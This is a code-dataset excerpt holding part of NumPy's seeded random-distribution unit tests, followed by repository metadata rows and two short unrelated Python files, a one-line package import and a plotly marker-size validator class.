assert_(np.random.choice(6, s, replace=False, p=p).shape, s)
assert_(np.random.choice(np.arange(6), s, replace=True).shape, s)
def test_bytes(self):
np.random.seed(self.seed)
actual = np.random.bytes(10)
desired = asbytes('\x82Ui\x9e\xff\x97+Wf\xa5')
np.testing.assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, 1),
("b", np.int32, 1)])]:
np.random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
np.random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
np.testing.assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5,4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
np.random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
np.random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
np.random.seed(self.seed)
actual = np.random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
np.random.seed(self.seed)
actual = np.random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
np.testing.assert_array_equal(actual, desired)
def test_chisquare(self):
np.random.seed(self.seed)
actual = np.random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
np.testing.assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
np.random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = np.random.mtrand.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, np.random.dirichlet, p, np.float(1))
def test_exponential(self):
np.random.seed(self.seed)
actual = np.random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_f(self):
np.random.seed(self.seed)
actual = np.random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
np.random.seed(self.seed)
actual = np.random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_geometric(self):
np.random.seed(self.seed)
actual = np.random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
np.testing.assert_array_equal(actual, desired)
def test_gumbel(self):
np.random.seed(self.seed)
actual = np.random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_hypergeometric(self):
np.random.seed(self.seed)
actual = np.random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
np.testing.assert_array_equal(actual, desired)
# Test nbad = 0
actual = np.random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
np.testing.assert_array_equal(actual, desired)
actual = np.random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
np.testing.assert_array_equal(actual, desired)
# Test ngood = 0
actual = np.random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
np.testing.assert_array_equal(actual, desired)
actual = np.random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
np.testing.assert_array_equal(actual, desired)
def test_laplace(self):
np.random.seed(self.seed)
actual = np.random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_logistic(self):
np.random.seed(self.seed)
actual = np.random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
np.random.seed(self.seed)
actual = np.random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
np.testing.assert_array_almost_equal(actual, desired, decimal=13)
def test_logseries(self):
np.random.seed(self.seed)
actual = np.random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
np.testing.assert_array_equal(actual, desired)
def test_multinomial(self):
np.random.seed(self.seed)
actual = np.random.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
np.testing.assert_array_equal(actual, desired)
def test_multivariate_normal(self):
np.random.seed(self.seed)
mean = (.123456789, 10)
# Hmm... not even symmetric.
cov = [[1, 0], [1, 0]]
size = (3, 2)
actual = np.random.multivariate_normal(mean, cov, size)
desired = np.array([[[-1.47027513018564449, 10.],
[-1.65915081534845532, 10.]],
[[-2.29186329304599745, 10.],
[-1.77505606019580053, 10.]],
[[-0.54970369430044119, 10.],
[0.29768848031692957, 10.]]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = np.random.multivariate_normal(mean, cov)
desired = np.array([-0.79441224511977482, 10.])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance raises warning
mean = [0, 0]
cov = [[1, 1 + 1e-10], [1 + 1e-10, 1]]
assert_warns(RuntimeWarning, np.random.multivariate_normal, mean, cov)
def test_negative_binomial(self):
np.random.seed(self.seed)
actual = np.random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
np.testing.assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
actual = np.random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[ 1.47145377828516666, 0.15052899268012659],
[ 0.00943803056963588, 1.02647251615666169],
[ 0.332334982684171 , 0.15451287602753125]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
np.random.seed(self.seed)
actual = np.random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
np.random.seed(self.seed)
actual = np.random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_pareto(self):
np.random.seed(self.seed)
actual = np.random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# http://mail.scipy.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
np.random.seed(self.seed)
actual = np.random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
np.testing.assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, np.random.poisson, lamneg)
assert_raises(ValueError, np.random.poisson, [lamneg]*10)
assert_raises(ValueError, np.random.poisson, lambig)
assert_raises(ValueError, np.random.poisson, [lambig]*10)
def test_power(self):
np.random.seed(self.seed)
actual = np.random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
np.random.seed(self.seed)
actual = np.random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_cauchy(self):
np.random.seed(self.seed)
actual = np.random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
np.random.seed(self.seed)
actual = np.random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
np.random.seed(self.seed)
actual = np.random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_normal(self):
np.random.seed(self.seed)
actual = np.random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
np.random.seed(self.seed)
actual = np.random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
np.random.seed(self.seed)
actual = np.random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
np.random.seed(self.seed)
actual = np.random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = np.random.uniform
np.testing.assert_raises(OverflowError, func, -np.inf, 0)
np.testing.assert_raises(OverflowError, func, 0, np.inf)
np.testing.assert_raises(OverflowError, func, fmin, fmax)
# (fmax / 1e17) - fmin is within range, so this should not throw
np.random.uniform(low=fmin, high=fmax / 1e17)
def test_vonmises(self):
np.random.seed(self.seed)
actual = np.random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
np.random.seed(self.seed)
r = np.random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
def test_wald(self):
np.random.seed(self.seed)
actual = np.random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
np.random.seed(self.seed)
actual = np.random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_zipf(self):
np.random.seed(self.seed)
actual = np.random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
np.testing.assert_array_equal(actual, desired)
class TestThread(object):
# make sure each state produces the same sequence even in threads
def setUp(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(np.random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(np.random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if (np.intp().dtype.itemsize == 4 and sys.platform == "win32"):
np.testing.assert_array_almost_equal(out1, out2)
else:
np.testing.assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000,6))
if __name__ == "__main__":
run_module_suite()
| 44.907818
| 88
| 0.571403
|
7f8b4727b91698c45d131ec345a0b4ceefe851a2
| 21
|
py
|
Python
|
modules/retrieval/text_classification/libs/customdatasets/__init__.py
|
martinhoang11/vietnamese-ocr-toolbox
|
524b4908bedceb0c87b2c7cd7b5e3f6e1126ace5
|
[
"Apache-2.0"
] | 14
|
2021-09-05T10:42:14.000Z
|
2022-03-10T16:27:26.000Z
|
modules/retrieval/text_classification/libs/customdatasets/__init__.py
|
martinhoang11/vietnamese-ocr-toolbox
|
524b4908bedceb0c87b2c7cd7b5e3f6e1126ace5
|
[
"Apache-2.0"
] | 1
|
2021-06-16T11:35:24.000Z
|
2021-06-16T11:35:24.000Z
|
modules/retrieval/text_classification/libs/customdatasets/__init__.py
|
martinhoang11/vietnamese-ocr-toolbox
|
524b4908bedceb0c87b2c7cd7b5e3f6e1126ace5
|
[
"Apache-2.0"
] | 5
|
2021-09-05T13:26:51.000Z
|
2022-03-09T07:49:45.000Z
|
from .mcocr import *
| 10.5
| 20
| 0.714286
|
9b353307a2fceecef14982f76c268060b280c09e
| 547
|
py
|
Python
|
plotly/validators/scattergeo/marker/_size.py
|
gnestor/plotly.py
|
a8ae062795ddbf9867b8578fe6d9e244948c15ff
|
[
"MIT"
] | 2
|
2018-12-03T15:20:42.000Z
|
2018-12-03T15:20:47.000Z
|
plotly/validators/scattergeo/marker/_size.py
|
gnestor/plotly.py
|
a8ae062795ddbf9867b8578fe6d9e244948c15ff
|
[
"MIT"
] | 27
|
2020-04-28T21:23:12.000Z
|
2021-06-25T15:36:38.000Z
|
plotly/validators/scattergeo/marker/_size.py
|
gnestor/plotly.py
|
a8ae062795ddbf9867b8578fe6d9e244948c15ff
|
[
"MIT"
] | 2
|
2019-06-17T01:35:57.000Z
|
2020-11-03T01:07:19.000Z
|
import _plotly_utils.basevalidators
class SizeValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name='size', parent_name='scattergeo.marker', **kwargs
):
super(SizeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop('array_ok', True),
edit_type=kwargs.pop('edit_type', 'calc'),
min=kwargs.pop('min', 0),
role=kwargs.pop('role', 'style'),
**kwargs
)
| 30.388889
| 75
| 0.610603
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.